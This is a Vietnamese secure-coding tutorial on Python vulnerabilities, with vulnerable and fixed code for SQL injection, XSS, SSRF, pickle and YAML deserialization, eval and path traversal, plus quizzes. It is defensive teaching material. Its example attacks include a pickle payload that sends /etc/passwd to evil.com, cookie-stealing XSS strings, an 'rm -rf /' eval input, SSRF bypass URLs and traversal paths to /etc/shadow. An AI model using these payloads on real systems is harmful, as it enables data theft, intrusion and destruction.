Skip to content

Lỗ hổng bảo mật phổ biến trong Python

Tháng 3 năm 2023, một startup fintech tại Đông Nam Á mất hơn 2 triệu USD vì một dòng code Python duy nhất: pickle.loads(user_input). Kẻ tấn công gửi payload serialized qua API endpoint, trigger remote code execution, và dump toàn bộ database chứa thông tin tài chính của 400.000 người dùng. Đội ngũ backend — toàn senior engineer — không ai ngờ rằng một thư viện standard library lại là cánh cửa mở toang cho attacker.

Bảo mật không phải feature bạn "thêm vào sau". Nó là thuộc tính cốt lõi của mọi dòng code. Khi bạn gọi eval(), khi bạn nối string vào SQL query, khi bạn trust user input mà không validate — bạn đang tạo lỗ hổng mà attacker chỉ cần vài phút để khai thác, nhưng bạn sẽ mất vài tuần để khắc phục hậu quả.

Bài viết này phân tích các lỗ hổng nguy hiểm nhất trong hệ sinh thái Python — từ OWASP Top 10 đến attack vector cụ thể — với code thực chiến và phương pháp phòng chống đã kiểm chứng trong production.

Bức tranh tư duy

Hãy hình dung ứng dụng Python của bạn như một căn nhà ở Sài Gòn. Bạn có cổng chính (authentication), khóa cửa (authorization), tường rào (firewall). Nhưng attacker không đi cửa chính — họ tìm cửa sổ quên khóa (SQL injection), ống thoát nước đủ rộng để chui vào (SSRF), hay chìa khóa dự phòng giấu dưới chậu cây (hardcoded secrets).

┌─────────────────────────────────────────────────────────────────┐
│                    ỨNG DỤNG PYTHON CỦA BẠN                      │
│                                                                  │
│  ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐  │
│  │ CỔNG     │    │ CỬA SỔ   │    │ ỐNG NƯỚC │    │ MÁI NHÀ  │  │
│  │ CHÍNH    │    │ (Input)  │    │ (Network)│    │ (Config) │  │
│  │ Auth     │    │ SQL Inj. │    │ SSRF     │    │ Misconf  │  │
│  │ Login    │    │ XSS      │    │ Deser.   │    │ Secrets  │  │
│  │ Session  │    │ eval()   │    │ IDOR     │    │ Debug=On │  │
│  └────┬─────┘    └────┬─────┘    └────┬─────┘    └────┬─────┘  │
│       │               │               │               │         │
│       ▼               ▼               ▼               ▼         │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │              DATABASE / SENSITIVE DATA                    │   │
│  │         (Thứ mà attacker thực sự muốn lấy)              │   │
│  └──────────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────────┘

Nguyên tắc phòng thủ chiều sâu (Defense in Depth): Giống nhà ở Sài Gòn có cổng sắt, rồi cửa nhôm, rồi khóa phòng — mỗi lớp bảo vệ độc lập. Khi một lớp bị phá, các lớp khác vẫn đứng vững. Đừng bao giờ chỉ dựa vào một lớp bảo vệ duy nhất.

Cốt lõi kỹ thuật

OWASP Top 10 qua lăng kính Python

OWASP Top 10 (2021) xếp hạng lỗ hổng theo tần suất và mức độ nguy hiểm. Năm lỗ hổng critical nhất với Python:

HạngLỗ hổngẢnh hưởng với Python
A01Broken Access ControlDjango view thiếu @permission_required
A03InjectionSQL injection, eval(), pickle.loads()
A07Auth FailuresJWT misconfiguration, weak session
A08Data Integrity FailuresPickle deserialization, unsafe YAML load
A10SSRFrequests.get(user_url) không validate

SQL Injection — Kẻ giết người thầm lặng

SQL Injection xảy ra khi user input được nối trực tiếp vào SQL query. Vẫn là lỗ hổng số 1 dù đã tồn tại hơn 20 năm.

python
import sqlite3
from typing import Optional


def get_user_vulnerable(username: str) -> Optional[dict]:
    """SAI: Nối string trực tiếp — SQL Injection guaranteed."""
    conn = sqlite3.connect("app.db")
    # Attacker gửi: username = "' OR '1'='1' --"
    query = f"SELECT * FROM users WHERE username='{username}'"
    cursor = conn.cursor()
    cursor.execute(query)
    row = cursor.fetchone()
    conn.close()
    return dict(zip(["id", "username", "email"], row)) if row else None


def get_user_secure(username: str) -> Optional[dict]:
    """ĐÚNG: Parameterized query — database engine escape input."""
    conn = sqlite3.connect("app.db")
    try:
        cursor = conn.cursor()
        cursor.execute(
            "SELECT id, username, email FROM users WHERE username = ?",
            (username,),
        )
        row = cursor.fetchone()
        return {"id": row[0], "username": row[1], "email": row[2]} if row else None
    finally:
        conn.close()

XSS — Cross-Site Scripting

XSS xảy ra khi ứng dụng render user input thành HTML mà không escape. Trong Python web framework, thường xảy ra khi dùng |safe filter hoặc Markup().

python
import html
import bleach


def render_comment_vulnerable(comment: str) -> str:
    """SAI: Render HTML trực tiếp từ user input."""
    # Attacker: comment = "<script>fetch('https://evil.com?c='+document.cookie)</script>"
    return f"<div class='comment'>{comment}</div>"


def render_comment_secure(comment: str) -> str:
    """ĐÚNG: Escape tất cả HTML entities."""
    safe_comment = html.escape(comment, quote=True)
    return f"<div class='comment'>{safe_comment}</div>"


def sanitize_rich_text(user_html: str) -> str:
    """Cho phép một số tag HTML an toàn, loại bỏ phần còn lại."""
    return bleach.clean(
        user_html,
        tags=["p", "b", "i", "u", "a", "br", "ul", "ol", "li"],
        attributes={"a": ["href", "title"]},
        strip=True,
    )

SSRF — Server-Side Request Forgery

SSRF cho phép attacker lợi dụng server của bạn để gửi request đến internal service, cloud metadata endpoint, hoặc mạng nội bộ.

python
import ipaddress
import socket
from urllib.parse import urlparse
from typing import Optional
import requests

BLOCKED_CIDRS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),  # AWS metadata
]


def fetch_url_vulnerable(url: str) -> str:
    """SAI: Fetch URL từ user mà không validate."""
    # Attacker: url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    return requests.get(url, timeout=10).text


def is_safe_url(url: str) -> bool:
    """Validate URL không trỏ đến internal network."""
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https"):
            return False
        if not parsed.hostname:
            return False

        resolved = socket.getaddrinfo(parsed.hostname, parsed.port or 443)
        for _, _, _, _, sockaddr in resolved:
            ip = ipaddress.ip_address(sockaddr[0])
            for blocked in BLOCKED_CIDRS:
                if ip in blocked:
                    return False
        return True
    except (socket.gaierror, ValueError, OSError):
        return False


def fetch_url_secure(url: str) -> Optional[str]:
    """ĐÚNG: Validate URL trước khi fetch."""
    if not is_safe_url(url):
        raise ValueError(f"URL không được phép: {url}")

    response = requests.get(
        url,
        timeout=(3.05, 27),
        allow_redirects=False,
        headers={"User-Agent": "PenalgoBot/1.0"},
    )
    response.raise_for_status()
    return response.text

Deserialization Attack — Pickle là vũ khí

pickle là module serialization mặc định của Python. Nó có thể thực thi arbitrary code khi deserialize. Đây không phải bug — đây là by design.

python
import pickle
import json
import hmac
import hashlib
from typing import Any


class MaliciousPayload:
    """Payload thực thi command khi unpickle (CHỈ ĐỂ DEMO)."""
    def __reduce__(self):
        import os
        return (os.system, ("curl https://evil.com/exfil?data=$(cat /etc/passwd)",))


def load_session_vulnerable(data: bytes) -> Any:
    """SAI: pickle.loads() trên user input = Remote Code Execution."""
    return pickle.loads(data)


def load_session_secure(data: bytes, secret_key: bytes) -> dict:
    """ĐÚNG: JSON thay pickle, HMAC để verify integrity."""
    if len(data) < 32:
        raise ValueError("Dữ liệu không hợp lệ")

    signature, payload = data[:32], data[32:]
    expected_sig = hmac.new(secret_key, payload, hashlib.sha256).digest()

    if not hmac.compare_digest(signature, expected_sig):
        raise ValueError("Chữ ký không hợp lệ — dữ liệu bị tamper")

    return json.loads(payload)

eval() và exec() — Cánh cửa Code Injection

eval() biến string thành code thực thi. Nếu string đến từ user input, bạn vừa trao quyền kiểm soát server cho attacker.

python
import ast
import operator
from typing import Union


def calculate_vulnerable(expression: str) -> float:
    """SAI: eval() trên user input."""
    # Attacker: expression = "__import__('os').system('rm -rf /')"
    return eval(expression)


def calculate_with_ast(expression: str) -> Union[int, float]:
    """ĐÚNG: ast.literal_eval() cho biểu thức đơn giản."""
    try:
        result = ast.literal_eval(expression)
        if not isinstance(result, (int, float)):
            raise ValueError("Chỉ chấp nhận số")
        return result
    except (ValueError, SyntaxError) as e:
        raise ValueError(f"Biểu thức không hợp lệ: {e}")


SAFE_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.Pow: operator.pow, ast.USub: operator.neg,
}


def safe_eval_math(expression: str) -> Union[int, float]:
    """ĐÚNG: Parse và evaluate biểu thức toán học an toàn."""
    tree = ast.parse(expression, mode="eval")

    def _eval(node: ast.AST) -> Union[int, float]:
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp):
            op_func = SAFE_OPS.get(type(node.op))
            if not op_func:
                raise ValueError(f"Phép toán không được phép: {type(node.op).__name__}")
            left, right = _eval(node.left), _eval(node.right)
            if isinstance(node.op, ast.Pow) and right > 100:
                raise ValueError(f"Số mũ quá lớn: {right}")
            return op_func(left, right)
        if isinstance(node, ast.UnaryOp) and type(node.op) in SAFE_OPS:
            return SAFE_OPS[type(node.op)](_eval(node.operand))
        raise ValueError(f"Node không được phép: {type(node).__name__}")

    return _eval(tree)

Path Traversal — Đọc file ngoài phạm vi

Path traversal cho phép attacker truy cập file ngoài thư mục cho phép bằng ../ trong đường dẫn.

python
from pathlib import Path

UPLOAD_DIR = Path("/var/www/uploads")


def read_file_vulnerable(filename: str) -> str:
    """SAI: Nối path trực tiếp."""
    # Attacker: filename = "../../../etc/passwd"
    with open(f"{UPLOAD_DIR}/{filename}", "r") as f:
        return f.read()


def read_file_secure(filename: str) -> str:
    """ĐÚNG: Resolve path và verify nằm trong thư mục cho phép."""
    requested = (UPLOAD_DIR / filename).resolve()
    if not str(requested).startswith(str(UPLOAD_DIR.resolve())):
        raise PermissionError(f"Truy cập bị từ chối: {filename}")
    if not requested.is_file():
        raise FileNotFoundError("File không tồn tại")
    return requested.read_text(encoding="utf-8")


def save_upload_secure(filename: str, content: bytes) -> Path:
    """Lưu file upload an toàn với sanitized filename."""
    safe_name = "".join(c for c in Path(filename).name if c.isalnum() or c in ".-_")
    if not safe_name or safe_name.startswith("."):
        raise ValueError("Tên file không hợp lệ")

    dest = (UPLOAD_DIR / safe_name).resolve()
    if not str(dest).startswith(str(UPLOAD_DIR.resolve())):
        raise PermissionError("Path traversal detected")

    dest.write_bytes(content)
    return dest

Thực chiến

CVE-2022-42969: ReDoS trong Python library

ReDoS (Regular Expression Denial of Service) — attacker gửi input khiến regex engine chạy thời gian exponential:

python
import re
import signal
from typing import Optional


# Regex vulnerable: nested quantifiers gây catastrophic backtracking
VULNERABLE_EMAIL = re.compile(
    r"^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z]{2,4})+$"
)
# Input attacker: "a" * 50 + "@" → treo server hàng phút

# ĐÚNG: Regex không có nested quantifiers
SAFE_EMAIL = re.compile(r"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$")


def regex_with_timeout(
    pattern: re.Pattern, text: str, timeout_sec: int = 2
) -> Optional[re.Match]:
    """Chạy regex với timeout phòng ReDoS (Unix only)."""
    class RegexTimeout(Exception):
        pass

    def handler(signum, frame):
        raise RegexTimeout("Regex timeout — possible ReDoS")

    old = signal.signal(signal.SIGALRM, handler)
    signal.alarm(timeout_sec)
    try:
        return pattern.match(text)
    except RegexTimeout:
        return None
    finally:
        signal.alarm(0)
        signal.signal(signal.SIGALRM, old)

YAML Deserialization — Lỗ hổng trong nhiều thư viện

python
import yaml
from dataclasses import dataclass
from pathlib import Path


def load_config_vulnerable(config_path: str) -> dict:
    """SAI: yaml.load() với FullLoader cho phép construct Python objects."""
    with open(config_path) as f:
        # Attacker inject: !!python/object/apply:os.system ["curl evil.com"]
        return yaml.load(f, Loader=yaml.FullLoader)


def load_config_secure(config_path: str) -> dict:
    """ĐÚNG: SafeLoader chỉ parse YAML data types."""
    path = Path(config_path)
    if not path.is_file():
        raise FileNotFoundError(f"Config không tồn tại: {config_path}")

    with open(path, "r", encoding="utf-8") as f:
        config = yaml.safe_load(f)

    if not isinstance(config, dict):
        raise ValueError("Config phải là YAML mapping")
    return config


@dataclass
class DatabaseConfig:
    host: str = "localhost"
    port: int = 5432
    name: str = "app_db"

    def __post_init__(self):
        if not 1 <= self.port <= 65535:
            raise ValueError(f"Port không hợp lệ: {self.port}")


def load_database_config(config_path: str) -> DatabaseConfig:
    """Load và validate database config an toàn."""
    raw = load_config_secure(config_path)
    return DatabaseConfig(**raw.get("database", {}))

Sai lầm điển hình

Sai lầm 1: Trust user input cho file operations

python
# ❌ SAI: Trust user input cho đường dẫn
def download(filename: str) -> bytes:
    with open(f"/var/data/{filename}", "rb") as f:
        return f.read()
    # Attacker: filename = "../../etc/shadow"

# ✅ ĐÚNG: Resolve và validate path
def download_safe(filename: str) -> bytes:
    base = Path("/var/data").resolve()
    target = (base / filename).resolve()
    if not str(target).startswith(str(base)):
        raise PermissionError("Access denied")
    return target.read_bytes()

Sai lầm 2: String formatting cho SQL

python
# ❌ SAI: f-string trong SQL query
def search_users(name: str, role: str):
    query = f"SELECT * FROM users WHERE name LIKE '%{name}%' AND role = '{role}'"
    cursor.execute(query)

# ✅ ĐÚNG: Parameterized query
def search_users_safe(name: str, role: str):
    cursor.execute(
        "SELECT * FROM users WHERE name LIKE ? AND role = ?",
        (f"%{name}%", role),
    )
    return cursor.fetchall()

Sai lầm 3: Dùng |safe trong template mà không sanitize

python
# ❌ SAI: Render HTML từ user trong Jinja2 template
# Template: <div>{{ user_bio | safe }}</div>
# Attacker: "<img src=x onerror='fetch(`https://evil.com?c=${document.cookie}`)'>"

# ✅ ĐÚNG: Sanitize trước khi đánh dấu safe
import bleach

def render_bio_safe(user_bio: str) -> str:
    return bleach.clean(
        user_bio,
        tags=["p", "b", "i", "br", "a"],
        attributes={"a": ["href"]},
        protocols=["https"],
        strip=True,
    )

Sai lầm 4: Dùng random thay secrets cho token

python
import random
import secrets

# ❌ SAI: random có thể predict nếu biết seed
def gen_token_bad():
    return "".join(random.choices("abcdef0123456789", k=32))

# ✅ ĐÚNG: secrets dùng CSPRNG
def gen_token_safe() -> str:
    return secrets.token_hex(32)

Sai lầm 5: Không set timeout cho outbound requests

python
import requests

# ❌ SAI: Không timeout → thread blocked vĩnh viễn
def call_api_bad(url: str):
    return requests.get(url).json()

# ✅ ĐÚNG: Luôn set connect + read timeout
def call_api_safe(url: str):
    try:
        resp = requests.get(url, timeout=(3.05, 27), allow_redirects=False)
        resp.raise_for_status()
        return resp.json()
    except requests.exceptions.Timeout:
        raise TimeoutError(f"API timeout: {url}")
    except requests.exceptions.RequestException as e:
        raise RuntimeError(f"API error: {e}")

Under the Hood

Pickle Exploitation — Cách attacker craft payload

Khi Python unpickle object, nó gọi __reduce__() để reconstruct. Attacker override method này để thực thi arbitrary code:

Pickle Protocol Flow:

pickle.dumps()  ──→  Byte Stream (opcodes)  ──→  pickle.loads()


                                               __reduce__() được gọi
                                               return (func, (args,))


                                               Python THỰC THI func(*args)
                                               → Remote Code Execution

Pickle dùng stack-based virtual machine với opcodes. Khi gặp opcode REDUCE, nó pop function và args từ stack, rồi gọi function(*args). Attacker kiểm soát cả function lẫn args → RCE.

SQL Injection — Tại sao parameterized query an toàn

String Concatenation (VULNERABLE):
  Input:  name = "'; DROP TABLE users; --"
  Query:  SELECT * FROM users WHERE name = ''; DROP TABLE users; --'
          ──────────────────────────────── ──────────────────── ───
          Query gốc                        SQL inject           Comment

Parameterized Query (SAFE):
  Input:  name = "'; DROP TABLE users; --"
  Query:  SELECT * FROM users WHERE name = ?
  Params: ["'; DROP TABLE users; --"]
          → Database treat as DATA, không bao giờ parse thành SQL syntax

Database engine phân tách query structuredata values ở protocol level. Dù attacker gửi gì trong parameter, nó chỉ là data.

SSRF Bypass Techniques

Attacker có nhiều kỹ thuật bypass IP validation:

python
# Các dạng URL attacker dùng để bypass SSRF filter
SSRF_BYPASSES = [
    "http://0x7f000001/",           # 127.0.0.1 dạng hex
    "http://2130706433/",           # 127.0.0.1 dạng decimal
    "http://0177.0.0.1/",          # 127.0.0.1 dạng octal
    "http://[::1]/",               # IPv6 loopback
    "http://evil.com@127.0.0.1/",  # URL authority confusion
]

# DNS Rebinding:
# Lần resolve 1: evil.com → 1.2.3.4 (public, pass validation)
# Lần resolve 2: evil.com → 169.254.169.254 (AWS metadata!)
# Giải pháp: Pin DNS resolution, validate IP SAU KHI resolve


def validate_url_defense_in_depth(url: str) -> bool:
    """Validate URL với nhiều lớp phòng thủ."""
    from urllib.parse import urlparse
    import ipaddress, socket

    parsed = urlparse(url)

    # Layer 1: Scheme whitelist
    if parsed.scheme not in ("http", "https"):
        return False
    # Layer 2: Chặn credentials trong URL
    if parsed.username or parsed.password:
        return False
    # Layer 3: Resolve DNS rồi check IP
    hostname = parsed.hostname
    if not hostname:
        return False
    try:
        for _, _, _, _, sockaddr in socket.getaddrinfo(hostname, None):
            ip = ipaddress.ip_address(sockaddr[0])
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                return False
    except (socket.gaierror, ValueError):
        return False
    return True

Checklist ghi nhớ

✅ Checklist triển khai

Input Validation

  • [ ] Tất cả user input được validate trước khi sử dụng
  • [ ] SQL query dùng parameterized statements, không string concatenation
  • [ ] HTML output escape mặc định, chỉ dùng |safe sau khi sanitize với bleach
  • [ ] File path được resolve() và verify nằm trong thư mục cho phép

Serialization & Code Execution

  • [ ] Không dùng pickle.loads() trên untrusted data — thay bằng JSON
  • [ ] Không dùng eval() / exec() trên user input — dùng ast.literal_eval()
  • [ ] YAML load dùng yaml.safe_load(), không dùng yaml.load() với FullLoader
  • [ ] Không dùng subprocess với shell=True khi có user input

Network & External Resources

  • [ ] Outbound HTTP requests luôn có timeout (connect + read)
  • [ ] URL từ user được validate: scheme, hostname, resolved IP
  • [ ] Redirect bị disable hoặc validate cho outbound requests
  • [ ] Rate limiting áp dụng cho tất cả external-facing endpoints

Cryptography & Secrets

  • [ ] Token generation dùng secrets, không dùng random
  • [ ] Password hashing dùng bcrypt/argon2, không dùng MD5/SHA
  • [ ] Secret keys không hardcode trong source code
  • [ ] HMAC dùng hmac.compare_digest() tránh timing attack

Bài tập luyện tập

Bài 1: Phát hiện lỗ hổng trong code review

Đọc đoạn code và liệt kê tất cả lỗ hổng bảo mật:

python
from flask import Flask, request, render_template_string
import pickle, base64, sqlite3

app = Flask(__name__)

@app.route("/search")
def search():
    query = request.args.get("q", "")
    db = sqlite3.connect("app.db")
    results = db.execute(
        f"SELECT * FROM products WHERE name LIKE '%{query}%'"
    ).fetchall()
    return render_template_string(
        f"<h1>Kết quả: {query}</h1>"
        f"<ul>{''.join(f'<li>{r[1]}</li>' for r in results)}</ul>"
    )

@app.route("/load-cart", methods=["POST"])
def load_cart():
    data = base64.b64decode(request.form["cart"])
    return {"items": pickle.loads(data)}

🧠 Quiz

Câu hỏi: Đoạn code trên chứa bao nhiêu lỗ hổng critical?

  • A) 2
  • B) 3
  • C) 4
  • D) 5
Đáp án và giải thích

Đáp án: C) 4 lỗ hổng critical

  1. SQL Injection: f-string nối trực tiếp query vào SQL.
  2. Reflected XSS: render_template_string render query thành HTML không escape.
  3. Stored XSS: r[1] từ database render không escape (nếu data bị inject trước đó).
  4. Pickle RCE: pickle.loads(data) trên user-controlled base64 input.

Code đã fix:

python
@app.route("/search")
def search():
    query = request.args.get("q", "")
    db = sqlite3.connect("app.db")
    results = db.execute(
        "SELECT id, name FROM products WHERE name LIKE ?",
        (f"%{query}%",),
    ).fetchall()
    return render_template("search.html", query=query, results=results)

@app.route("/load-cart", methods=["POST"])
def load_cart():
    import json
    try:
        cart = json.loads(request.form["cart"])
        if not isinstance(cart, list):
            return {"error": "Invalid format"}, 400
        return {"items": cart}
    except (json.JSONDecodeError, KeyError):
        return {"error": "Invalid request"}, 400

Bài 2: Xây dựng SSRF-safe URL fetcher

Viết hàm safe_fetch(url: str) -> str thỏa mãn: chỉ HTTP/HTTPS, chặn private IP, có timeout, chặn redirect, giới hạn response 1MB.

🧠 Quiz

Câu hỏi: Kỹ thuật nào KHÔNG giúp phòng chống SSRF?

  • A) Validate resolved IP sau DNS lookup
  • B) Disable HTTP redirects
  • C) Dùng HTTPS thay HTTP
  • D) Whitelist allowed domains
Đáp án và lời giải

Đáp án: C) Dùng HTTPS thay HTTP

HTTPS chỉ encrypt traffic, không ngăn server gửi request đến internal network. Attacker vẫn có thể target https://169.254.169.254/.

python
import ipaddress, socket, requests
from urllib.parse import urlparse

BLOCKED = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
]
MAX_BYTES = 1_048_576


def safe_fetch(url: str) -> str:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"Scheme không hợp lệ: {parsed.scheme}")
    if parsed.username or parsed.password:
        raise ValueError("URL chứa credentials")
    if not parsed.hostname:
        raise ValueError("Thiếu hostname")

    for _, _, _, _, sockaddr in socket.getaddrinfo(parsed.hostname, parsed.port or 443):
        ip = ipaddress.ip_address(sockaddr[0])
        for net in BLOCKED:
            if ip in net:
                raise ValueError(f"IP {ip} bị chặn")

    resp = requests.get(
        url, timeout=(5, 30), allow_redirects=False, stream=True,
    )
    resp.raise_for_status()

    chunks, total = [], 0
    for chunk in resp.iter_content(8192):
        total += len(chunk)
        if total > MAX_BYTES:
            raise ValueError("Response vượt 1MB")
        chunks.append(chunk)

    return b"".join(chunks).decode("utf-8", errors="replace")

Bài 3: Secure Configuration Loader

🧠 Quiz

Câu hỏi: Đâu là cách an toàn nhất để load YAML trong Python?

  • A) yaml.load(f, Loader=yaml.FullLoader)
  • B) yaml.safe_load(f)
  • C) yaml.load(f, Loader=yaml.UnsafeLoader)
  • D) yaml.load(f)
Đáp án và lời giải

Đáp án: B) yaml.safe_load(f)

yaml.safe_load() chỉ parse standard YAML data types. Nó không construct Python objects, chặn hoàn toàn deserialization attack.

python
import os, yaml
from dataclasses import dataclass, field
from pathlib import Path


@dataclass
class AppConfig:
    app_name: str = "myapp"
    debug: bool = False
    port: int = 8000
    allowed_hosts: list[str] = field(default_factory=lambda: ["localhost"])
    database_url: str = field(init=False)

    def __post_init__(self):
        self.database_url = os.environ.get("DATABASE_URL", "")
        if not self.database_url:
            raise ValueError("DATABASE_URL env var is required")
        if not 1024 <= self.port <= 65535:
            raise ValueError(f"Port ngoài khoảng cho phép: {self.port}")


def load_app_config(config_path: str) -> AppConfig:
    path = Path(config_path)
    if not path.is_file():
        raise FileNotFoundError(f"Config không tồn tại: {config_path}")

    with open(path, "r", encoding="utf-8") as f:
        raw = yaml.safe_load(f)

    if not isinstance(raw, dict):
        raise ValueError("Config phải là YAML mapping")

    allowed = {"app_name", "debug", "port", "allowed_hosts"}
    return AppConfig(**{k: v for k, v in raw.items() if k in allowed})

Liên kết học tiếp